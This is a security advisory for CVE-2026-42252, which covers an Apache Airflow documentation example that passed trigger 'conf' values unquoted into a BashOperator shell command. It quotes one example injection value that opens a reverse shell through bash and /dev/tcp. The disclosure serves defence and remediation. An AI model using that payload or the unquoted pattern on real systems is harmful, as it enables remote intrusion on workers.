Severity: low
Affected versions:
- Apache Airflow (apache-airflow) 3.0.0 before 3.2.2
Description:
Apache Airflow's official documentation at `core-concepts/dag-run.html`
("Passing Parameters when triggering Dags") showed a verbatim
`BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example
without any quoting / sanitization warning. Dag authors who copied the pattern
verbatim into deployments where users had `Dag.can_trigger` permission on the
affected Dag (typical multi-team deployments, hosted offerings exposing a
trigger API) could be exposed to shell-metacharacter injection via the `conf`
field of the trigger API: an authenticated trigger user could supply `"; bash
-i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on
the worker. This CVE covers the documentation correction in `apache/airflow` PR
64129 — the pattern in the docs example now includes explicit shell-quoting and
a safety caveat. Affects deployments whose Dag code was modeled on the
pre-correction docs example. Same class as the prior CVE-2025-50213 and
CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to
`apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped
with the release.
Credit:
anonymous (finder)
Kevin Yang (sjyangkevin) (remediation developer)
References:
https://github.com/apache/airflow/pull/64129
https://airflow.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-42252
